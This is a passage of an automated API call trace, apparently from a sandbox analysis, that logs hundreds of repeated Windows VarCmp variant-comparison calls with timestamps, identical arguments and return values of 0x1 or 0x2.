lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.955] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.955] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.955] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.955] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.955] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.955] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.956] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.956] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.956] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.956] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.956] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.956] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.956] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.956] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.956] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.956] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.956] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.956] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.956] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.956] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.956] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.956] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.956] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.956] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.956] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.956] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.956] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.956] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.956] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.956] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.957] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.957] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.957] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.957] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.957] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.957] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.957] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.957] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.957] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.957] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.957] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.957] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.957] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.957] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.957] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.957] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.957] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.957] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.957] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.957] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.957] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.957] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.957] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.957] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.957] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.958] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.958] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.958] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.958] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.958] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.958] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.958] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.958] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.958] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.958] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.958] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.958] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.958] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.958] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.958] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.958] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.958] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.958] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.958] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.958] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.958] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.958] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.958] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.958] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.959] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.959] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.959] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.959] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.959] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.959] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.959] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.959] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.959] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.959] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.959] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.959] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.959] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.959] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.959] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.959] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.959] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.959] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.959] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.959] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.959] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.959] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.959] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.959] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.959] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.960] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.960] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.960] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.960] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.960] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.960] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.960] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.960] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.960] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.960] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.960] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.960] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.960] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.960] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.960] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.960] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.960] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.960] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.960] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.960] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.960] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.960] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.960] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.960] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.960] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.960] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.961] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.961] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.961] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.961] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.961] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.961] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.961] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.961] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.961] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.961] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.961] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.961] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.961] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.961] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.961] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.961] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.961] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.961] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.961] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.961] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.961] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.961] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.961] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.961] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.961] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.962] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.962] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.962] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.962] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.962] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.962] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.962] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.962] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.962] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.962] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.962] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.962] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.962] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.962] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.962] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.962] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.962] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.962] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.962] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.962] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.962] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.962] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.962] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.962] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.962] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.963] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.963] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.963] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.963] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.963] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.963] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.963] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.963] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.963] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.963] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.963] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.963] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.963] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.963] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.963] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.963] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.963] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.963] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.963] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.963] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.963] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.963] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.963] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.963] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.963] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.963] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.964] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.964] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.964] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.964] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.964] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.964] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.964] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.964] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.964] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.964] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.964] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.964] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.964] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.964] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.964] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.964] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.964] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.964] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.964] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.964] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.964] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.964] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.964] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.964] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.965] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.965] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.965] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.965] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 